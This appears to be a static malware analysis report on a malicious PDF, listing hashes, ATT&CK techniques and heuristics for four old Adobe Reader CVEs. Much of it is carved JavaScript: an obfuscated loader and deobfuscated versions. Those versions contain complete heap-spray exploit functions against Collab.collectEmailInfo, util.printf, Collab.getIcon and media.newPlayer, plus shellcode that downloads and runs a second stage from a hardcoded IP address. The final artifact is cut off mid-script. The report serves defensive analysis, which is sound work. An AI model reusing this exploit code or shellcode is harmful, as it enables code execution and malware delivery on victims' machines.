Malicious PDF — malware analysis report

Static analysis result for SHA-256 ceecf12142df9cb9…

Verdict: MALICIOUS
File type: PDF
Size: 12.6 KB
First seen: 2026-05-09
MD5: c5890edceef4d542261021d970af94f3
SHA-1: 571c20c5d331d24d93d3874bf1b577f5f0507b1a
SHA-256: ceecf12142df9cb97b45d4064608b1e875f7d795c7f47533f557f57d5a9e24c4
Risk score: 490

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.007 JavaScript

The PDF file contains embedded JavaScript that exploits multiple known Adobe Reader vulnerabilities, including CVE-2009-4324, CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The deobfuscated JavaScript indicates that it attempts to download a second-stage payload from the URL http://66.199.229.50/w.php?f=39&e=5. This exploit kit functionality is characteristic of a downloader or initial access stage.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (12)

  • media.newPlayer — CVE-2009-4324 [critical; CVE match: exact; rule CVE_2009_4324]
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 [critical; CVE match: exact; rule CVE_2009_0927]
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 [critical; CVE match: exact; rule CVE_2007_5659]
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 [critical; CVE match: exact; rule CVE_2008_2992]
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher [critical; CVE match: likely; rule PDF_PIDIEF_MULTI_CVE_DISPATCH]
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit [critical; rule PDF_ADOBE_READER_MULTI_CVE_JS_KIT]
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • Generic recovered JavaScript exploit stage [high; rule PDF_GENERIC_STAGE_RECOVERY]
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • JavaScript action [low; 2 related findings; rule PDF_JAVASCRIPT]
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF exploit shellcode contains an embedded download URL [high; rule PDF_JS_SHELLCODE_DOWNLOAD_URL]
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream [low; rule PDF_JS]
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact [info; rule EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info; rule EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://66.199.229.50/w.php?f=39&e=5 (referenced by PDF JavaScript)

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename: javascript_obj0076_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 76 at offset 0x369
Size: 11759 bytes
SHA-256: d1856e0bdc5308ae3214e15673177a268a1502f78b6f6120f4c969070252b73f
Script preview (first 1,000 lines of the extracted script):
j='4wbt43t';
z
=
new
Array(64,30,61,43,61,34,6,34,44,44,57,45,59,32,22,34,72,41,55,12,17,17,72,41,30,27,43,47,72,41,55,52,30,27,72,41,15,52,43,47,72,41,43,74,12,47,72,41,12,12,52,30,72,41,17,47,27,65,72,41,47,65,55,57,72,41,55,57,12,65,72,41,65,27,47,65,72,41,15,65,55,57,72,41,52,17,6,27,72,41,15,17,55,57,72,41,12,12,65,55,72,41,17,17,73,57,72,41,52,43,55,57,72,41,65,12,12,27,72,41,12,12,15,47,72,41,55,6,7,27,72,41,6,52,43,43,72,41,30,30,6,65,72,41,57,55,30,30,72,41,47,65,55,57,72,41,27,12,12,65,72,41,12,74,47,17,72,41,15,52,65,17,72,41,55,15,30,57,72,41,7,47,12,47,72,41,43,47,55,52,72,41,52,6,15,52,72,41,43,57,43,74,72,41,52,6,47,27,72,41,55,57,52,17,72,41,12,27,15,52,72,41,15,47,55,57,72,41,15,55,12,52,72,41,30,52,65,12,72,41,55,57,52,17,72,41,7,65,15,17,72,41,30,52,65,12,72,41,27,74,12,12,72,41,47,6,47,74,72,41,29,73,30,27,72,41,27,52,65,12,72,41,73,57,12,12,72,41,57,43,65,30,72,41,12,55,6,65,72,41,15,47,30,7,72,41,27,6,65,55,72,41,65,73,27,57,72,41,73,29,65,12,72,41,43,57,47,65,72,41,12,57,30,6,72,41,15,52,6,30,72,41,52,43,43,17,72,41,52,43,55,57,72,41,65,12,7,47,72,41,17,17,73,73,72,41,65,27,55,57,72,41,55,73,47,57,72,41,43,27,47,17,72,41,52,47,30,30,72,41,65,27,7,47,72,41,73,55,55,57,72,41,73,73,65,12,72,41,65,47,55,57,72,41,65,12,55,57,72,41,29,57,27,52,72,41,52,74,52,43,72,41,43,57,27,12,72,41,29,73,52,12,72,41,17,55,55,57,72,41,55,65,7,65,72,41,65,27,15,73,72,41,15,47,12,12,72,41,74,17,65,12,72,41,30,12,43,57,72,41,17,55,55,57,72,41,55,57,65,55,72,41,17,29,30,15,72,41,52,74,65,52,72,41,74,55,43,55,72,41,30,30,30,30,72,41,43,7,30,30,72,41,43,55,30,74,72,41,65,65,65,65,72,41,65,65,65,65,72,41,52,65,52,55,72,41,47,65,17,29,72,41,30,30,17,55,72,41,65,65,65,65,72,41,52,65,65,65,72,41,27,65,55,12,72,41,52,65,6,74,72,41,55,57,52,52,72,41,55,57,43,27,72,41,6,65,52,43,72,41,27,12,55,12,72,41,30,30,65,52,72,41,17,55,43,12,72,41,17,43,17,30,72,41,65,65,65,65,72,41,15,52,17,55,72,41,17,27,15,7,72,41,52,47,17,73,72,41,6,17,30,30,72,41,27,47,55,12,72,41,55,57,65,55,72,41,43,55,43,55,72,41,30
,30,17,6,72,41,30,30,30,30,72,41,65,7,43,57,72,41,15,7,43,57,72,41,43,27,55,6,72,41,65,6,65,47,72,41,65,65,65,65,72,41,52,27,55,73,72,41,65,27,7,47,72,41,65,47,27,15,72,41,15,7,7,47,72,41,17,15,17,52,72,41,27,15,15,12,72,41,7,47,47,47,72,41,15,17,65,47,72,41,12,12,15,7,72,41,27,15,12,7,72,41,7,47,47,47,72,41,7,65,65,55,72,41,15,12,7,73,72,41,52,12,7,65,72,41,30,55,17,55,72,41,65,65,65,65,72,41,30,30,65,65,72,41,65,27,52,17,72,41,43,55,55,57,72,41,27,74,12,12,72,41,27,15,52,6,72,41,6,73,47,47,72,41,15,15,65,65,72,41,17,7,15,65,72,41,27,15,15,47,72,41,6,73,47,47,72,41,7,43,65,52,72,41,17,27,17,47,72,41,27,17,17,27,72,41,6,73,47,47,72,41,65,65,65,74,72,41,55,29,52,74,72,41,65,47,27,6,72,41,55,55,12,65,72,41,6,73,47,47,72,41,47,6,65,47,72,41,17,29,52,6,72,41,17,29,65,65,72,41,52,12,65,65,72,41,17,29,52,15,72,41,30,30,65,65,72,41,6,47,52,17,72,41,27,65,55,52,72,41,6,17,15,52,72,41,65,65,17,29,72,41,30,30,52,12,72,41,65,47,52,17,72,41,65,65,17,29,72,41,43,57,55,12,72,41,52,12,65,27,72,41,52,17,30,30,72,41,55,12,65,47,72,41,65,27,27,12,72,41,65,7,43,57,72,41,6,12,43,57,72,41,55,65,47,15,72,41,65,65,12,30,72,41,30,29,15,52,72,41,55,65,47,15,72,41,65,65,12,30,72,41,27,47,15,52,72,41,65,65,17,29,72,41,30,43,17,29,72,41,52,17,30,30,72,41,43,55,65,55,72,41,30,43,74,27,72,41,30,30,30,30,72,41,47,43,55,43,72,41,43,27,65,43,72,41,30,43,74,55,72,41,65,43,55,29,72,41,17,30,55,74,72,41,57,73,65,6,72,41,27,29,12,12,72,41,52,57,55,29,72,41,27,17,6,57,72,41,15,74,47,17,72,41,6,29,12,17,72,41,15,65,7,30,72,41,15,47,17,55,72,41,15,65,15,47,72,41,7,30,12,29,72,41,12,17,7,30,72,41,7,43,12,17,72,41,12,74,12,6,72,41,7,43,12,74,72,41,12,7,12,7,72,41,7,43,12,74,72,41,12,65,12,52,72,41,15,15,7,30,72,41,15,65,7,43,72,41,15,65,17,55,72,41,17,17,12,30,72,41,12,12,12,73,72,41,7,17,12,74,72,41,12,73,17,52,72,41,65,65,12,52,72,41,65,65,65,65,34,26,30,41,25,27,62,64,38,25,69,43,2,1,9,61,9,29,60,58,67,44,18,23,54,64,49,43,61,9,29,20,49,43,25,32,62,54,63,7,3,58,67,44,18,9,29,21,22,9,29,26,53,9,29,22,9,29
,20,59,41,57,59,62,9,64,25,32,61,65,60,58,67,36,7,44,26,9,43,62,41,9,25,69,9,29,26,53,69,30,41,25,27,62,64,38,25,69,57,51,61,44,18,1,29,9,69,73,10,32,22,25,43,23,69,4,9,9,29,67,61,44,26,1,29,9,69,1,23,22,65,51,65,27,65,27,65,27,65,27,26,1,29,9,69,29,73,73,9,22,65,51,47,65,65,65,65,65,26,1,29,9,69,28,29,67,49,38,29,73,22,41,25,43,59,27,29,28,43,61,57,45,59,32,44,26,1,29,9,69,59,27,68,49,43,25,22,28,29,67,49,38,29,73,20,49,43,25,32,62,54,63,7,26,1,29,9,69,58,67,22,29,73,73,9,31,61,59,27,68,49,43,25,21,65,51,12,55,44,26,1,29,9,69,67,29,9,59,28,22,41,25,43,59,27,29,28,43,61,5,72,41,74,65,74,65,72,41,74,65,74,65,5,44,26,67,29,9,59,28,22,43,2,1,9,61,67,29,9,59,28,60,58,67,44,26,1,29,9,69,27,38,41,25,62,7,22,61,1,23,31,65,51,47,65,65,65,65,65,44,36,29,73,73,9,26,30,38,9,61,1,29,9,69,27,38,41,25,62,22,65,26,27,38,41,25,62,3,27,38,41,25,62,7,26,27,38,41,25,62,21,21,44,18,73,10,32,14,27,38,41,25,62,48,22,67,29,9,59,28,21,28,29,67,49,38,29,73,26,53,69,1,29,9,69,38,1,43,9,30,49,38,23,22,41,25,43,59,27,29,28,43,61,5,72,41,65,27,65,27,72,41,65,27,65,27,5,44,26,23,54,64,49,43,61,38,1,43,9,30,49,38,23,20,49,43,25,32,62,54,3,47,47,74,52,7,44,18,38,1,43,9,30,49,38,23,21,22,38,1,43,9,30,49,38,23,26,53,69,62,54,64,59,20,27,38,49,49,29,57,39,62,38,9,43,22,75,38,49,49,29,57,20,27,38,49,49,43,27,62,13,66,29,64,49,0,25,30,38,61,18,59,41,57,45,40,5,5,60,66,59,32,40,38,1,43,9,30,49,38,23,53,44,26,53,69,30,41,25,27,62,64,38,25,69,28,9,64,25,62,30,61,44,18,25,38,28,22,41,25,43,59,27,29,28,43,61,5,72,41,65,4,65,4,72,41,65,4,65,4,72,41,65,4,65,4,72,41,65,4,65,4,5,44,26,1,29,9,69,28,29,67,49,38,29,73,22,41,25,43,59,27,29,28,43,61,57,45,59,32,44,26,54,43,29,28,57,49,38,27,10,22,25,38,28,21,28,29,67,49,38,29,73,26,57,64,32,57,49,38,27,10,22,41,25,43,59,27,29,28,43,61,5,72,41,65,4,65,4,72,41,65,4,65,4,5,44,26,54,43,29,73,43,9,59,64,2,43,22,7,65,26,59,28,9,29,67,22,54,43,29,73,43,9,59,64,2,43,21,54,43,29,28,57,49,38,27,10,20,49,43,25,32,62,54,26,23,54,64,49,43,61,57,64,32,57,49,38,27,10,20,49,43,25,3
2,62,54,3,59,28,9,29,67,44,18,57,64,32,57,49,38,27,10,21,22,57,64,32,57,49,38,27,10,26,53,69,30,64,49,49,57,49,38,27,10,22,57,64,32,57,49,38,27,10,20,59,41,57,59,62,9,64,25,32,61,65,60,59,28,9,29,67,44,26,57,49,38,27,10,22,57,64,32,57,49,38,27,10,20,59,41,57,59,62,9,64,25,32,61,65,60,57,64,32,57,49,38,27,10,20,49,43,25,32,62,54,31,59,28,9,29,67,44,26,23,54,64,49,43,61,57,49,38,27,10,20,49,43,25,32,62,54,21,59,28,9,29,67,3,65,51,47,65,65,65,65,44,18,57,49,38,27,10,22,57,49,38,27,10,21,57,49,38,27,10,21,30,64,49,49,57,49,38,27,10,26,53,69,66,43,66,22,25,43,23,69,4,9,9,29,67,61,44,26,30,38,9,61,64,22,65,26,64,3,6,47,65,65,26,64,21,21,44,18,66,43,66,14,64,48,22,57,49,38,27,10,21,54,43,29,28,57,49,38,27,10,26,53,69,1,29,9,69,25,41,66,22,6,7,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,74,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,55,26,41,62,64,49,20,28,9,64,25,62,30,61,5,72,47,52,65,65,65,30,5,60,25,41,66,44,26,53,69,30,41,25,27,62,64,38,25,69,32,43,62,64,27,38,25,61,44,18,1,29,9,69,29,9,9,67,22,25,43,23,69,4,9,9,29,67,61,44,26,64,30,61,29,28,28,20,73,38,27,20,75,38,49,49,29,57,20,32,43,62,0,27,38,25,44,18,1,29,9,69,28,29,67,49,38,29,73,22,41,25,43,59,27,29,28,43,61,57,45,59,32,44,26,1,29,9,69,54,
24,58,52,65,65,75,50,22,28,29,67,49,38,29,73,20,49,43,25,32,62,54,63,7,26,1,29,9,69,58,67,22,65,51,47,65,65,65,65,65,31,61,54,24,58,52,65,65,75,50,21,65,51,12,55,44,26,1,29,9,69,67,29,9,59,28,22,41,25,43,59,27,29,28,43,61,5,72,41,74,65,74,65,72,41,74,65,74,65,5,44,26,67,29,9,59,28,22,43,2,1,9,61,67,29,9,59,28,60,58,67,44,26,1,29,9,69,28,52,4,45,33,17,52,30,22,61,65,51,65,27,65,27,65,27,65,27,31,65,51,47,65,65,65,65,65,44,36,65,51,47,65,65,65,65,65,26,30,38,9,61,1,29,9,69,1,58,27,42,8,74,17,67,22,65,26,1,58,27,42,8,74,17,67,3,28,52,4,45,33,17,52,30,26,1,58,27,42,8,74,17,67,21,21,44,18,29,9,9,67,14,1,58,27,42,8,74,17,67,48,22,67,29,9,59,28,21,28,29,67,49,38,29,73,26,53,69,1,29,9,69,62,70,56,54,50,57,37,23,22,41,25,43,59,27,29,28,43,61,5,72,65,74,5,44,26,23,54,64,49,43,61,62,70,56,54,50,57,37,23,20,49,43,25,32,62,54,3,65,51,47,65,65,65,44,18,62,70,56,54,50,57,37,23,21,22,62,70,56,54,50,57,37,23,26,53,69,62,70,56,54,50,57,37,23,22,5,50,20,5,21,62,70,56,54,50,57,37,23,26,29,28,28,20,73,38,27,20,75,38,49,49,29,57,20,32,43,62,0,27,38,25,61,62,70,56,54,50,57,37,23,44,26,53,53,69,29,46,49,41,32,64,25,59,22,29,28,28,20,28,49,41,32,0,25,59,26,1,29,9,69,59,1,22,28,29,9,59,43,0,25,62,61,29,28,28,20,1,64,43,23,43,9,71,43,9,59,64,38,25,20,62,38,39,62,9,64,25,32,61,44,20,27,54,29,9,4,62,61,65,44,44,26,30,38,9,61,1,29,9,69,64,22,65,26,64,3,29,46,49,41,32,64,25,59,20,49,43,25,32,62,54,26,64,21,21,44,18,64,30,61,29,46,49,41,32,64,25,59,14,64,48,20,25,29,66,43,22,22,34,13,39,27,9,64,28,62,34,44,18,1,29,9,69,49,1,22,29,46,49,41,32,64,25,59,14,64,48,20,1,43,9,59,64,38,25,26,53,53,69,64,30,61,61,49,1,22,22,74,44,16,16,61,61,59,1,22,22,55,44,35,35,61,49,1,3,22,55,20,6,7,44,44,44,18,32,43,62,64,27,38,25,61,44,26,53,43,49,59,43,69,64,30,61,49,1,22,22,15,20,6,44,18,28,9,64,25,62,30,61,44,26,53,43,49,59,43,69,64,30,61,61,61,59,1,22,22,17,44,16,16,61,59,1,22,22,15,44,44,35,35,61,49,1,3,15,20,6,6,44,44,18,57,51,61,44,26,53,43,49,59,43,69,64,30,61,61,49,1,19,22,74,20,6,44,16,16,61,49,1,3,22,74,20
,7,44,16,16,61,49,1,19,22,55,20,6,12,44,16,16,61,49,1,3,22,55,20,6,15,44,44,18,30,41,25,27,62,64,38,25,69,29,61,44,18,41,62,64,49,20,28,9,64,25,62,73,61,34,28,11,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,69,40,69,67,67,67,67,6,6,6,34,60,25,43,23,69,8,29,62,43,61,44,44,26,53,1,29,9,69,54,22,29,28,28,20,28,49,41,32,0,25,59,26,30,38,9,61,1,29,9,69,30,22,65,26,30,3,54,20,49,43,25,32,62,54,26,30,21,21,44,18,64,30,61,54,14,30,48,20,25,29,66,43,22,22,34,13,39,27,9,64,28,62,34,44,18,1,29,9,69,64,22,54,14,30,48,20,1,43,9,59,64,38,25,26,53,53,69,64,30,61,61,64,19,55,20,6,7,44,35,35,61,64,3,55,20,7,44,44,18,27,22,25,43,23,69,4,9,9,29,67,61,44,26,1,29,9,69,73,22,41,25,43,59,27,29,28,43,61,34,72,41,74,65,74,65,72,41,74,65,74,65,34,44,26,1,29,9,69,43,22,41,25,43,59,27,29,28,43,61,57,45,59,32,44,26,23,54,64,49,43,61,73,20,49,43,25,32,62,54,3,22,65,51,55,65,65,65,44,18,73,21,22,73,26,53,73,22,73,20,59,41,57,59,62,9,61,65,60,65,51,55,65,65,65,31,43,20,49,43,25,32,62,54,44,26,30,38,9,61,30,22,65,26,30,3,7,74,65,65,26,30,21,21,44,18,27,14,30,48,22,73,21,43,26,53,29,61,44,26,29,61,44,26,62,9,67,18,62,54,64,59,20,66,43,73,64,29,20,25,43,23,46,49,29,67,43,9,61,25,41,49,49,44,26,53,27,29,62,27,54,61,43,44,18,53,29,61,44,26,53,53);
a=new String("Ivz<A'12Drk@3E[7|6{>.+=wWn;cpaf-gK'&/GoS:uQe)jP4]lNx5}h8Mbqs,(t*i0my_ UV%d9C");
b="al";
b2="v"
+b;
try
{
for(i in app)
if(i=='printerNames')
fqwf-1;
}catch(q){
e=j['substr']();
try{
b='e'+b2;
if(!google.search())
a=2;
}
catch(q){
e=
e[
b];
}
s=new String();try{if(!google.search())throw 1;}catch(q){r=1;}{
for(j=0;j<z.length;j++)
try{
if(!google.search())throw 1;}catch(q){
s
+=
a[
z[j]];
}
}}

try{if(!google.search())bbb-123;}
catch(nergerg){
e(s);
}
Filename: generic_stage_recovery_000.js
Kind: deobfuscated-js
Source: generic stage recovery (alphabet-index-array) from JavaScript object 76 at offset 0x369
Size: 3858 bytes
SHA-256: e2ca0edd0408060452bde7de995df6571bedb1cd01804c4ffddfbb2430acd291
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Script preview (first 1,000 lines of the extracted script):
if(e('1'))bjsg='%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u362f%u2e36%u3931%u2e39%u3232%u2e39%u3035%u772f%u702e%u7068%u663f%u333d%u2639%u3d65%u0035%u0000';function ezvr(ra,qy){while(ra.length*2<qy){ra+=ra;}ra=ra.substring(0,qy/2);return ra;} function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var payload=unescape(bjsg);var sc_len=payload.length*2;var qy=addr-(sc_len+0x38);var yarsp=unescape('%u9090%u9090');yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr;for(var count=0;count<count2;count++){dkg[count]=yarsp+payload;} var overflow=unescape('%u0c0c%u0c0c');while(overflow.length<44952){overflow+=overflow;} this.collabStore=Collab.collectEmailInfo({subj:'',msg:overflow});} function printf(){nop=unescape('%u0A0A%u0A0A%u0A0A%u0A0A');var 
payload=unescape(bjsg);heapblock=nop+payload;bigblock=unescape('%u0A0A%u0A0A');headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;} fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;} mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock;} var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf('%45000f',num);} function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(bjsg);var hWq500CN=payload.length*2;var qy=0x400000-(hWq500CN+0x38);var yarsp=unescape('%u9090%u9090');yarsp=ezvr(yarsp,qy);var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++){arry[vqcQD96y]=yarsp+payload;} var tUMhNbGw=unescape('%09');while(tUMhNbGw.length<0x4000){tUMhNbGw+=tUMhNbGw;} tUMhNbGw='N.'+tUMhNbGw;app.doc.Collab.getIcon(tUMhNbGw);}} aPlugins=app.plugIns;var sv=parseInt(app.viewerVersion.toString().charAt(0));for(var i=0;i<aPlugins.length;i++){if(aPlugins[i].name=='EScript'){var lv=aPlugins[i].version;}} if((lv==9)||((sv==8)&&(lv<=8.12))){geticon();}else if(lv==7.1){printf();}else if(((sv==6)||(sv==7))&&(lv<7.11)){bx();}else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17)){function a(){util.printd('p@111111111111111111111111 : yyyy111',new Date());}var h=app.plugIns;for(var f=0;f<h.length;f++){if(h[f].name=='EScript'){var i=h[f].version;}} if((i>8.12)&&(i<8.2)){c=new Array();var d=unescape('%u9090%u9090');var e=unescape(bjsg);while(d.length<=0x8000){d+=d;}d=d.substr(0,0x8000-e.length);for(f=0;f<2900;f++){c[f]=d+e;}a();a();try{this.media.newPlayer(null);}catch(e){}a();}}
Filename: generic_stage_recovery_001.js
Kind: deobfuscated-js
Source: generic stage recovery (percent-decode) from JavaScript object 76 at offset 0x369
Size: 3854 bytes
SHA-256: e21e5029305be298c90417eb5941f175eecaffe1fc56e113916a4d3e903194ae
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 11 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Script preview (first 1,000 lines of the extracted script):
if(e('1'))bjsg='%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u362f%u2e36%u3931%u2e39%u3232%u2e39%u3035%u772f%u702e%u7068%u663f%u333d%u2639%u3d65%u0035%u0000';function ezvr(ra,qy){while(ra.length*2<qy){ra+=ra;}ra=ra.substring(0,qy/2);return ra;} function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var payload=unescape(bjsg);var sc_len=payload.length*2;var qy=addr-(sc_len+0x38);var yarsp=unescape('%u9090%u9090');yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr;for(var count=0;count<count2;count++){dkg[count]=yarsp+payload;} var overflow=unescape('%u0c0c%u0c0c');while(overflow.length<44952){overflow+=overflow;} this.collabStore=Collab.collectEmailInfo({subj:'',msg:overflow});} function printf(){nop=unescape('%u0A0A%u0A0A%u0A0A%u0A0A');var 
payload=unescape(bjsg);heapblock=nop+payload;bigblock=unescape('%u0A0A%u0A0A');headersize=20;spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;} fillblock=bigblock.substring(0,spray);block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;} mem=new Array();for(i=0;i<1400;i++){mem[i]=block+heapblock;} var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf('E000f',num);} function geticon(){var arry=new Array();if(app.doc.Collab.getIcon){var payload=unescape(bjsg);var hWq500CN=payload.length*2;var qy=0x400000-(hWq500CN+0x38);var 